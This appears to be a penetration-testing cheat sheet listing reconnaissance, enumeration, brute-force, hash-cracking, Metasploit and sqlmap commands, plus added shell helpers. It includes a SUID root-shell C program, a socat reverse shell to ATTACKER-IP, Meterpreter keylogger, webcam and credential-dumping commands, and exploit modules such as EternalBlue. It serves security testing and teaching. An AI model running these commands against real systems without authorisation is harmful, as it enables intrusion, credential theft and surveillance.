This cheat sheet is a quick reference for the commands and techniques used in penetration testing: reconnaissance, enumeration, exploitation, privilege escalation, password cracking and exploit research. It is written for newcomers and experienced testers alike; each section gives the command first and then what it does, plus the caveat you would otherwise learn the hard way.
Nmap

| Command | Description |
|---|---|
| nmap -v -sS -A -T4 target | Verbose scan: TCP SYN ("stealth") scan, T4 timing, OS and service version detection, traceroute and the default NSE scripts (all enabled by -A). Needs root for -sS and -O. |
| nmap -sn 192.168.1.0/24 | Ping sweep: host discovery only, no port scan, to list which IPs in the range are up. (Older releases spelled it -sP; -Pn is different and means "skip host discovery".) |
| nmap -v -sS -p- -A -T4 target | As above, but scans all 65535 TCP ports (slower). |
| nmap -v -sU -sS -p- -A -T4 target | As above, plus a UDP scan of all ports (much slower; most hosts rate-limit ICMP port-unreachable replies, which is what UDP scanning relies on). |
| nmap -v -p 445 --script=smb-check-vulns --script-args=unsafe=1 192.168.1.X | Scan for vulnerable SMB servers. smb-check-vulns has been removed from current Nmap releases; use --script=smb-vuln-* instead. unsafe=1 enables checks that can crash the service. |
| nmap localhost | Show which ports are open on the local machine. |
| ls /usr/share/nmap/scripts/* \| grep ftp | Search the installed NSE scripts by keyword. |
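The scans above are normally run with -oG so the results can be fed to the next tool. The following shell helper, an added example and not part of the original cheat sheet, parses Nmap grepable output and prints only the open ports per host, then filters hosts by a given port (for example to build a target list for Hydra). The sample scan output is constructed by hand inside the block, so it runs without Nmap installed; note that UDP results reported as open|filtered are deliberately not counted as open.

```shell
#!/bin/sh
# Parse Nmap -oG (grepable) output: print "ip port/proto service" for open ports.
# Added example; the sample below is constructed, not a real scan.

sample_gnmap() {
    # Constructed -oG output: two hosts up, one down (tab-separated fields as Nmap writes them).
    printf '# Nmap 7.94 scan initiated (constructed sample)\n'
    printf 'Host: 192.168.1.10 ()\tStatus: Up\n'
    printf 'Host: 192.168.1.10 ()\tPorts: 22/open/tcp//ssh//OpenSSH 8.9p1//, 80/open/tcp//http//nginx 1.18//, 445/closed/tcp//microsoft-ds///\tIgnored State: filtered (997)\n'
    printf 'Host: 192.168.1.11 ()\tPorts: 53/open/udp//domain///, 161/open|filtered/udp//snmp///\tIgnored State: closed (998)\n'
    printf 'Host: 192.168.1.12 ()\tStatus: Down\n'
    printf '# Nmap done: 3 IP addresses (2 hosts up)\n'
}

# Reads -oG text on stdin. Each "Ports:" field holds comma-separated entries of the form
# port/state/proto/owner/service/rpcinfo/version/ ; only state == open is reported,
# so "open|filtered" UDP guesses are left out on purpose.
open_ports_from_gnmap() {
    awk -F'\t' '
    /^Host: / {
        ip = $1
        sub(/^Host: /, "", ip); sub(/ .*/, "", ip)
        for (i = 2; i <= NF; i++) {
            if ($i !~ /^Ports: /) continue
            ports = $i
            sub(/^Ports: /, "", ports)
            n = split(ports, entry, ", ")
            for (j = 1; j <= n; j++) {
                split(entry[j], f, "/")
                if (f[2] == "open")
                    printf "%s %s/%s %s\n", ip, f[1], f[3], f[5]
            }
        }
    }'
}

# hosts_with_port PORT/PROTO : unique IPs with that port open, one per line
# (e.g. `nmap -oG scan.gnmap ...; hosts_with_port 22/tcp < scan.gnmap > ssh_targets.txt`).
hosts_with_port() {
    open_ports_from_gnmap | awk -v want="$1" '$2 == want { print $1 }' | sort -u
}

# Demo on the constructed sample.
sample_gnmap | open_ports_from_gnmap
```

Real output from `nmap -oG scan.gnmap ...` has the same layout, so `open_ports_from_gnmap < scan.gnmap` works unchanged; the version field (f[7]) is available if you want to print it too.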
In computer networks, Server Message Block (SMB) operates as an application layer network protocol and is primarily used to provide shared access to files, printers, and serial ports.
SMB enumeration

| Command | Description |
|---|---|
| nbtscan 192.168.1.0/24 | Discover Windows/Samba servers on a subnet: NetBIOS names, MAC addresses and workgroups/domains. |
| enum4linux -a target-ip | Run every enumeration option except dictionary-based share name guessing (users, groups, shares, password policy, workgroup/domain). |
| smbclient -L target-ip | List the SMB shares offered by the target (add -N for a null session). |
| smbget -R smb://target-ip/share | Recursively download an SMB share. |
| rpcclient -U "" target-ip | Null-session MSRPC connection (empty username); type help for the available commands. |
| showmount -e target-ip | List the exports of an NFS server (NFS, not SMB). |
| smbmap -H target-ip | Show share permissions for the current (or null) user. |
| smbstatus | List current Samba connections; run on a Samba server you already control. |
Alternative host discovery methods that do not use Nmap.
| Command | Description |
|---|---|
| netdiscover -r 192.168.1.0/24 | ARP-based discovery of IPs, MAC addresses and MAC vendors on the local subnet. |
| arp-scan --interface=eth0 192.168.1.0/24 | ARP scan of the local network; works at layer 2, so it finds hosts that drop ICMP. |
| fping -g 192.168.1.0/24 | Send ICMP echo requests to every address in the range and report which respond. |
| masscan -p1-65535,U:1-65535 192.168.1.0/24 --rate=1000 | Scan all TCP and UDP ports at high speed; good for a first pass, then follow up with nmap -sV on what it finds. |
Python local web server commands to facilitate shell and vulnerability exploitation on attack machines.
| Command | Description |
|---|---|
| python -m SimpleHTTPServer 80 | Python 2: serve the current directory over HTTP, handy for delivering a shell or tool to the target. |
| python3 -m http.server 80 | Python 3 equivalent (Python 2 is end-of-life; prefer this one). |
| python3 -m http.server 80 --bind 192.168.1.2 | Bind the server to one interface only. --bind exists in Python 3's http.server (3.4+); Python 2's SimpleHTTPServer has no such option. |
How to mount NFS/CIFS, Windows and Linux file shares.
| Command | Description |
|---|---|
| mount 192.168.1.1:/vol/share /mnt/nfs | Mount an NFS export at /mnt/nfs. |
| mount -t cifs -o username=user,password=pass,domain=blah //192.168.1.X/share-name /mnt/cifs | Mount a Windows CIFS/SMB share on Linux at /mnt/cifs. |
| net use Z: \\win-server\share password /user:domain\janedoe /savecred /p:no | Map a Windows share to drive Z: from the Windows command line. |
| apt-get install smb4k -y | Install smb4k on Kali, a Linux GUI for browsing SMB shares. |
| smbclient -L //192.168.1.X -U username | List the SMB shares on a Windows host as a given user. |
Device fingerprinting or machine fingerprinting or browser fingerprinting is information collected about a remote computing device for identification purposes.
| Command | Description |
|---|---|
| nc -v 192.168.1.1 25 | Grab the service banner with netcat for basic version fingerprinting. |
| telnet 192.168.1.1 25 | Same banner grab with telnet. |
| curl -I 192.168.1.1 | Fetch only the HTTP response headers (Server, X-Powered-By, ...) to fingerprint the web server. |
| nmap -O 192.168.1.1 | OS detection from TCP/IP stack behaviour (needs root). |
| whatweb 192.168.1.1 | Identify the web technologies (server, CMS, frameworks) used by the target. |
SNMP enumeration queries the SNMP agent on a target (UDP 161) with a guessed community string, typically "public", to pull system information: users, running processes, installed software, interfaces, routes and open connections.

| Command | Description |
|---|---|
| snmpcheck -t 192.168.1.X -c public | SNMP enumeration with a readable summary (the binary is called snmp-check on current Kali). |
| snmpwalk -c public -v1 192.168.1.X 1 | Walk the whole MIB tree with the "public" community. |
| snmpenum -t 192.168.1.X | SNMP enumeration |
| onesixtyone -c names -i hosts | Brute-force community strings: names is a file of community strings to try, hosts a file of targets. |
| snmpbulkwalk -v2c -c public -Cn0 -Cr10 192.168.1.X | Bulk walk using SNMPv2c GETBULK, faster than snmpwalk on large trees. |
DNS zone transfer

| Command | Description |
|---|---|
| nslookup -> set type=any -> ls -d blah.com | Windows DNS zone transfer (inside nslookup, after pointing it at an authoritative server with server ns1.blah.com). |
| dig axfr blah.com @ns1.blah.com | Linux DNS zone transfer; the server after @ must be one of the domain's authoritative nameservers, and each of them should be tried since they are often configured differently. |
| host -l blah.com ns1.blah.com | Another Linux zone transfer method. |

DNSRecon performs a range of DNS enumeration tasks (standard records, zone transfer attempts, subdomain brute force, reverse lookups):

dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std,brt --xml output.xml

The -D wordlist is only used by the brt (brute force) enumeration type, so std alone would ignore it; -t takes a comma-separated list.
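The zone transfer commands above target one server at a time, but every authoritative nameserver should be tried. The helper below, an added example and not part of the original cheat sheet, looks up the NS records with dig and attempts AXFR against each one, reporting success only when the response contains the zone's SOA record (a refusal yields nothing, or "Transfer failed."). It assumes dig from bind9-dnsutils; the DIG variable is a hypothetical hook so a stub can replace dig for offline testing.

```shell
#!/bin/sh
# Try a zone transfer against every authoritative nameserver of a domain.
# Added example. Assumes dig is installed; DIG may be overridden to substitute
# a stub (hypothetical hook, used only for testing without network access).

# axfr_check DOMAIN : exit 0 if any nameserver allowed AXFR, 1 if all refused,
# 2 if the domain has no NS records or the lookup failed.
axfr_check() {
    domain=$1
    allowed=1
    nameservers=$("${DIG:-dig}" +short NS "$domain") || return 2
    if [ -z "$nameservers" ]; then
        printf 'no NS records for %s\n' "$domain"
        return 2
    fi
    for ns in $nameservers; do
        ns=${ns%.}                              # strip the trailing dot
        zone=$("${DIG:-dig}" +noall +answer AXFR "$domain" "@$ns" 2>/dev/null)
        # A real transfer begins and ends with the SOA; key on that, not on exit codes.
        if printf '%s\n' "$zone" | grep -q '[[:space:]]IN[[:space:]]SOA[[:space:]]'; then
            n=$(printf '%s\n' "$zone" | grep -c '[[:space:]]IN[[:space:]]')
            printf 'AXFR allowed on %s: %s records\n' "$ns" "$n"
            allowed=0
        else
            printf 'AXFR refused on %s\n' "$ns"
        fi
    done
    return $allowed
}

# Usage: sh axfr_check.sh example.com
if [ $# -eq 1 ]; then
    axfr_check "$1"
fi
```

The record count includes the closing SOA, so a zone with one A record reports three records. Save the successful output with `dig +noall +answer AXFR domain @ns > zone.txt` afterwards; hostnames from it feed straight into the host discovery and web scanning steps.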
Web scanning

| Command | Description |
|---|---|
| nikto -h http://192.168.1.1 | Web server scan with nikto. |
| dirbuster | Directory brute force; configure it via the GUI, the CLI mode is unreliable. |
| gobuster dir -u http://192.168.1.1 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt | Directory and file brute force with gobuster. |
| wpscan --url http://192.168.1.1 | WordPress vulnerability scanner. |
| joomscan -u http://192.168.1.1 | Joomla vulnerability scanner. |
| uniscan -u http://192.168.1.1/ -qweds | Uniscan automated scan: -q directory checks, -w file checks, -e robots.txt/sitemap.xml, -d dynamic checks, -s static checks. |
| curl -I 192.168.1.1 | Fetch the HTTP headers with curl. |
| nmap -p80 --script http-enum 192.168.1.1 | NSE script that enumerates common web application paths. |
| whatweb 192.168.1.1 | Identify the technologies used on the site. |
| wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hc 404 http://192.168.1.1/FUZZ | Directory fuzzing with wfuzz, hiding 404 responses (--hc). |
Packet capture

| Command | Description |
|---|---|
| tcpdump -i eth0 -w output.pcap tcp port 80 | Capture port 80 traffic on eth0 to a pcap file (options come before the filter expression). |
| tcpdump -i eth0 'port 443 and tcp[tcpflags] & (tcp-syn\|tcp-ack) != 0' | Capture HTTPS packets that have the SYN or ACK flag set. |
| wireshark -k -i <interface> | Open Wireshark and start capturing on the given interface immediately. |
| tshark -i eth0 -f "tcp port 80" | Capture port 80 traffic with tshark, the command-line Wireshark. |
Username enumeration

| Command | Description |
|---|---|
| python /usr/share/doc/python-impacket-doc/examples/samrdump.py 192.168.XXX.XXX | Enumerate users over SMB/MSRPC (SAMR) with impacket's samrdump.py (installed as impacket-samrdump on current Kali). |
| ridenum.py 192.168.XXX.XXX 500 50000 dict.txt | RID cycling over a null session: enumerate accounts with RIDs 500 to 50000, then try the passwords in dict.txt against them. |
| enum4linux -U 192.168.XXX.XXX | Enumerate SMB usernames with enum4linux. |
| snmpwalk -c public -v1 192.168.X.XXX 1 \| grep 77.1.2.25 | Enumerate Windows users over SNMP: OID 1.3.6.1.4.1.77.1.2.25 is the LanManager user table. |
| python /usr/share/doc/python-impacket-doc/examples/samrdump.py 192.168.X.XXX | Same user enumeration as above; samrdump.py speaks MSRPC over SMB, not SNMP, so no protocol argument is needed. |
| nmap -sU -p 161 192.168.X.XXX/24 -oG snmp_results.txt | Find SNMP agents on the subnet (SNMP is UDP 161, so -sU rather than -sT), grepable output. |
Wordlists

| Location | Description |
|---|---|
| /usr/share/wordlists | Kali's bundled wordlists; rockyou.txt ships gzipped and must be decompressed before use. |
| wget 1000000.txt | Download the 1000000.txt wordlist from GitHub (the full URL is not reproduced on this page). |
Hydra brute force

| Command | Description |
|---|---|
| hydra -l USERNAME -P /usr/share/wordlists/nmap.lst -f 192.168.X.XXX ftp -V | Hydra FTP brute force |
| hydra -l USERNAME -P /usr/share/wordlists/nmap.lst -f 192.168.X.XXX pop3 -V | Hydra POP3 brute force |
| hydra -P /usr/share/wordlists/nmap.lst 192.168.X.XXX smtp -V | Hydra SMTP brute force |
| hydra -l root -P /usr/share/wordlists/nmap.lst 192.168.X.XXX ssh | Hydra SSH brute force |

-f stops after the first valid login, -V prints every attempt. -t limits the number of parallel connections (default 16), for example -t 15; for SSH use a low value such as -t 4, since sshd's MaxStartups limit and account lockout policies otherwise produce false negatives.
John the Ripper and hashcat

| Command | Description |
|---|---|
| john --wordlist=/usr/share/wordlists/rockyou.txt hashes | John the Ripper wordlist attack. |
| john --format=descrypt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt | Force the hash format (here traditional DES crypt) and attack with a wordlist. |
| john --format=descrypt hash --show | Print the passwords already cracked for that file from john.pot; --show cracks nothing itself. Omit --show and --wordlist to run John's default single, wordlist and incremental (brute force) modes. |
| hashcat -m 0 -a 0 hash.txt wordlist.txt | hashcat MD5 wordlist attack (-a 0 is straight mode). |
| hashcat -m 1000 -a 0 hash.txt wordlist.txt | hashcat NTLM wordlist attack. |
Exploit research

| Command | Description |
|---|---|
| searchsploit "windows 2003" \| grep -i local | Search the local Exploit-DB copy for Windows 2003 local exploits. |
| site:exploit-db.com exploit kernel <= 3 | Google search for kernel exploits on Exploit-DB. |
| grep -R "W7" /usr/share/metasploit-framework/modules/exploits/windows/* | Search the Metasploit modules for Windows 7 exploits. |
| msfconsole -q -x "search name:windows type:exploit" | Search Metasploit for Windows exploits from the command line. |
Header files needed when compiling exploits

| Operating system | Header files |
|---|---|
| Windows | process.h, string.h, winbase.h, windows.h, winsock2.h |
| Linux | arpa/inet.h, fcntl.h, netdb.h, netinet/in.h, sys/socket.h, sys/types.h, unistd.h |
Compiling exploits

| Command | Description |
|---|---|
| gcc -o exploit exploit.c | Basic GCC compile. |
| gcc -Wall -Wextra exploit.c -o exploit | Compile with all warnings enabled. |
| gcc -m32 exploit.c -o exploit | Build a 32-bit binary on 64-bit Linux (needs the gcc-multilib package); use it when the target is 32-bit. |
| i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe | Cross-compile a 32-bit Windows .exe on Linux, linking Winsock (old mingw32 toolchain; current Kali ships i686-w64-mingw32-gcc). |
| x86_64-w64-mingw32-gcc exploit.c -o exploit.exe | Cross-compile a 64-bit Windows .exe on Linux. |
SUID C shell

```c
#define _GNU_SOURCE      /* glibc needs this for the setresuid() prototype */
#include <stdlib.h>
#include <unistd.h>

/* Root shell for a binary that is owned by root and has the SUID bit set.
 * setresuid(0, 0, 0) makes the real, effective and saved UIDs all 0, so the
 * spawned shell keeps root; with only the effective UID raised, bash would
 * drop back to the real UID unless started with -p. Use "/bin/sh" instead
 * of "/bin/bash" on systems without bash. */
int main(void) {
    setresuid(0, 0, 0);
    system("/bin/bash");
    return 0;
}
```

| Command | Description |
|---|---|
| gcc -o suid suid.c | Compile the SUID shell; it only works once root has run chown root suid and chmod 4755 suid. |
| gcc -m32 -o suid suid.c | Compile a 32-bit SUID shell for 32-bit targets. |
Spawning TTY shells

Generate a TTY shell with Python (the usual first step after catching a raw reverse shell):
python -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
Spawn an interactive sh:
/bin/sh -i
Generate a Perl TTY shell:
perl -e 'exec "/bin/sh";'
Generate a Ruby TTY shell:
ruby -e 'exec "/bin/sh"'
Generate a Lua TTY shell:
lua -e 'os.execute("/bin/sh")'
Generate a TTY shell from Vi (inside the editor):
:!bash
Generate a TTY shell from Nmap (only old Nmap versions that still support --interactive):
!sh
Generate a TTY shell from awk:
awk 'BEGIN {system("/bin/sh")}'
Generate a fully interactive TTY shell with socat (run on the attacker machine; the target then connects back with socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:ATTACKER-IP:4444):
socat file:`tty`,raw,echo=0 tcp-listen:4444
Windows reverse Meterpreter payload:
set payload windows/meterpreter/reverse_tcp
Windows VNC injection payload (ViewOnly false allows keyboard and mouse control):
set payload windows/vncinject/reverse_tcp
set ViewOnly false
Linux reverse Meterpreter payload:
set payload linux/meterpreter/reverse_tcp
Android reverse Meterpreter payload:
set payload android/meterpreter/reverse_tcp
Meterpreter commands

| Command | Description |
|---|---|
| upload file c:\\windows | Upload a file to the Windows target. |
| download c:\\windows\\repair\\sam /tmp | Download a file from the Windows target. |
| execute -f c:\\windows\\temp\\exploit.exe | Run an .exe on the target. |
| execute -f cmd -c | Create a new channel running a cmd shell. |
| ps | List processes on the target. |
| shell | Drop into a system shell on the target. |
| getsystem | Try to escalate to SYSTEM with the built-in techniques. |
| hashdump | Dump the SAM password hashes (needs SYSTEM). |
| portfwd add -l 3389 -p 3389 -r target | Forward local port 3389 through the session to port 3389 on target, a host reachable from the compromised machine. |
| portfwd delete -l 3389 -p 3389 -r target | Remove that port forward. |
| screenshot | Capture a screenshot of the target desktop. |
| keyscan_start | Start the keylogger. |
| keyscan_dump | Dump the keystrokes collected so far. |
| webcam_snap | Take a webcam snapshot. |
| record_mic | Record from the microphone. |
| run post/windows/gather/enum_chrome | Enumerate Chrome browser data (saved logins, history, cookies). |
Common Metasploit exploits

| Command | Description |
|---|---|
| use exploit/windows/smb/ms08_067_netapi | MS08-067: Windows 2000, XP and 2003 remote exploit (Server service). |
| use exploit/windows/dcerpc/ms06_040_netapi | MS06-040: Windows NT, 2000, XP and 2003 remote exploit (the module name gives the correct bulletin number). |
| use exploit/windows/smb/ms09_050_smb2_negotiate_func_index | MS09-050: Windows Vista SP1/SP2 and Server 2008 (x86) SMBv2 remote exploit. |
| use exploit/windows/smb/ms17_010_eternalblue | MS17-010 EternalBlue: SMBv1 remote exploit via a Windows kernel pool corruption. |

Metasploit local privilege escalation

| Command | Description |
|---|---|
| use exploit/windows/local/bypassuac | UAC bypass; set the target and architecture to match the session (Windows 7, x86/x64). |
| use exploit/windows/local/ms10_015_kitrap0d | MS10-015 KiTrap0D local privilege escalation. |

Metasploit auxiliary scanners

| Command | Description |
|---|---|
| use auxiliary/scanner/http/dir_scanner | HTTP directory scanner. |
| use auxiliary/scanner/http/jboss_vulnscan | JBoss vulnerability scanner. |
| use auxiliary/scanner/mssql/mssql_login | MSSQL credential scanner. |
| use auxiliary/scanner/mysql/mysql_version | MySQL version scanner. |
| use auxiliary/scanner/oracle/oracle_login | Oracle login module. |

Metasploit payload delivery

| Command | Description |
|---|---|
| use exploit/multi/script/web_delivery | PowerShell (and Python/PHP) one-liner payload delivery over HTTP. |
| use post/windows/manage/powershell/exec_powershell | Upload and run a PowerShell script through an existing session. |
| use exploit/multi/http/jboss_maindeployer | Deploy a payload through the JBoss main deployer. |
| use exploit/windows/mssql/mssql_payload | Deliver a payload through MSSQL (xp_cmdshell). |

Metasploit post-exploitation modules

| Command | Description |
|---|---|
| run post/windows/gather/win_privs | Show the current user's privileges and whether UAC is in effect. |
| run post/windows/gather/credentials/gpp | Recover passwords stored in Group Policy Preferences (cpassword). |
| load mimikatz -> wdigest | Load Mimikatz and dump WDigest plaintext credentials. The mimikatz extension is deprecated; on current Metasploit use load kiwi followed by creds_wdigest. |
| run post/windows/gather/local_admin_search_enum | Identify other hosts on which the session's domain user has local administrator rights. |
Default TTL by operating system (initial value; a reply shows this minus the number of hops, so round up to the nearest default)

| Operating system | TTL |
|---|---|
| Windows | 128 |
| Linux | 64 |
| Solaris | 255 |
| Cisco / network devices | 255 |
Cisco IOS commands

| Command | Description |
|---|---|
| enable | Enter privileged (enable) mode. |
| conf t | Short for configure terminal: enter global configuration mode. |
| (config)# interface fa0/0 | Configure FastEthernet 0/0. |
| (config-if)# ip address <ip> <mask> | Assign an IP address to fa0/0. |
| (config)# line vty 0 4 | Configure the virtual terminal (remote login) lines. |
| (config-line)# login | Require a password on the vty lines. |
| (config-line)# password YOUR-PASSWORD | Set the remote login password. |
| # show running-config | Show the configuration currently loaded in memory. |
| # show startup-config | Show the configuration stored in NVRAM, used at boot. |
| # show version | Show the Cisco IOS version and hardware. |
| # show sessions | Show open sessions. |
| # show ip interface | Show IP interface status. |
| # show interface e0 | Show detailed information for one interface. |
| # show ip route | Show the routing table. |
| # show access-lists | Show the access lists. |
| # dir | List files on the current filesystem. |
| # dir all-filesystems | List files on every filesystem. |
| # dir /all | Include deleted files in the listing. |
| # terminal length 0 | Disable paging of terminal output. |
| # copy running-config tftp | Copy the running configuration to a TFTP server. |
| # copy running-config startup-config | Save the running configuration to the startup configuration (NVRAM). |
Hash length

| Hash | Size | Hex characters | hashcat mode |
|---|---|---|---|
| MD5 | 16 bytes | 32 | -m 0 |
| SHA-1 | 20 bytes | 40 | -m 100 |
| SHA-256 | 32 bytes | 64 | -m 1400 |
| SHA-512 | 64 bytes | 128 | -m 1700 |

Length identifies the digest size only, not the algorithm: NTLM (-m 1000) and MD4 are also 32 hex characters, so check where the hash came from before choosing a mode.

Hash examples (all of the plaintext "hashcat")

| Hash | Example |
|---|---|
| MD5 | 8743b52063cd84097a65d1633f5c74f5 |
| SHA-1 | b89eaac7e61417341b710b727768294d0e6a277b |
| SHA-256 | 127e6fbfe24a750e72930c220a8e138275656b8e5d8f48a98c3c92df2caba935 |
| SHA-512 | 82a9dda829eb7f8ffe9fbe49e45d47d2dad9664fbb7adf72492e3c81ebd3e29134d9bc12212bf83c6840f10e8246b9db54a4859b7ccd0123d86e5872c1e5082f |
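What the John and hashcat commands earlier on this page do, and what the hash length table decides, can be shown in a few lines of shell. The following is an added example, not part of the original cheat sheet: it picks the digest algorithm from the hash length, then hashes each word of a constructed wordlist with coreutils (md5sum, sha1sum, sha256sum, sha512sum) until one matches. The wordlist and the demo target hash are constructed inline; the MD5 value is the page's own example hash of "hashcat".

```shell
#!/bin/sh
# Minimal wordlist attack with coreutils, to show the mechanism behind
# `john --wordlist` and `hashcat -a 0`. Added example; wordlist is constructed.

# hash_tool HEXDIGEST : name of the coreutils tool matching the digest length.
# Length cannot separate MD5 from NTLM/MD4; this helper assumes the MD family.
hash_tool() {
    case ${#1} in
        32)  echo md5sum ;;
        40)  echo sha1sum ;;
        64)  echo sha256sum ;;
        128) echo sha512sum ;;
        *)   return 1 ;;
    esac
}

# crack_hash HEXDIGEST WORDLIST : print the matching word and return 0;
# return 1 if no word matches, 2 if the digest is not a supported hex string.
crack_hash() {
    target=$(printf '%s' "$1" | tr 'A-F' 'a-f')      # digests compare case-insensitively
    printf '%s' "$target" | grep -Eq '^[0-9a-f]+$' || {
        echo "not a hex digest: $1" >&2; return 2; }
    tool=$(hash_tool "$target") || {
        echo "unsupported digest length ${#target}" >&2; return 2; }
    # Read every line, including a final one without a trailing newline.
    while IFS= read -r word || [ -n "$word" ]; do
        h=$(printf '%s' "$word" | "$tool" | cut -d' ' -f1)
        if [ "$h" = "$target" ]; then
            printf '%s\n' "$word"
            return 0
        fi
    done < "$2"
    return 1
}

# Constructed wordlist (not rockyou); removed again on exit.
WORDLIST=$(mktemp)
trap 'rm -f "$WORDLIST"' EXIT
printf '%s\n' password 123456 'Summer2024!' hashcat letmein > "$WORDLIST"

# Demo: the MD5 example from the hash table above is md5("hashcat").
crack_hash 8743b52063cd84097a65d1633f5c74f5 "$WORDLIST"
```

This spawns a process per candidate and runs at a few thousand guesses per second; hashcat does the same comparison on a GPU at billions per second, which is why the choice of wordlist and rules matters more than the tool for anything beyond a demonstration.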
sqlmap

| Command | Description |
|---|---|
| sqlmap -u "http://meh.com" --forms --batch --crawl=10 --cookie=jsessionid=54321 --level=5 --risk=3 | Automated crawl-and-test: crawl 10 levels deep, test every form, never prompt, highest test level and risk (risk 3 adds OR-based tests that can modify data). |
| sqlmap -u TARGET -p PARAM --data=POSTDATA --cookie=COOKIE --level=3 --current-user --current-db --passwords --file-read="/var/www/blah.php" | Targeted test of one parameter; on success retrieve the current DB user and database, the DBMS password hashes, and read a file from the server's filesystem. |
| sqlmap -u "http://meh.com/meh.php?PARAM=VALUE" --dbms=mysql --technique=U --random-agent --dump | Union-based injection only (--technique=U) against a MySQL backend, random User-Agent, dump the data. |
| sqlmap -o -u "http://meh.com/form/" --forms | Test the forms found at the URL for injection (-o turns on all optimisation switches). |
| sqlmap -o -u "http://meh.com/vuln-form" --forms -D database-name -T users --dump | Dump the users table of the named database; sqlmap offers to crack any recognised password hashes as it dumps them. |
This article is only for technology sharing and should not be used for illegal purposes. If you are interested in the software or technology in this article, please feel free to communicate.